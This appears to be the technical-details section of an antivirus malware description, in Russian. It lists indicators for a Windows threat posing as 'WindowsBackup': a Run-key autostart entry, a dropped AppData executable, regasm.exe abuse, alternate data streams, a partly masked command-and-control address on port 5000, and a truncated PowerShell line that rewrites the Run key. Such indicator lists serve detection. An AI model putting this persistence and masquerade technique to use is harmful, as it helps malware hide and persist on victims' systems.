Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'WindowsBackup' = '%APPDATA%\WindowsBackup\WindowsBackup.exe'
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- <Текущая директория>:{7a006d00-3000-3200-4800-64004e005500}
- <Текущая директория>:{30002b00-7900-4100-4800-66006a006700}
- %PROGRAMDATA%\isolated storage\{30002b00-7900-4100-4800-66006a006700}
- %APPDATA%\windowsbackup\windowsbackup.exe
- '19#.#13.78.26':5000
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsBackup';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'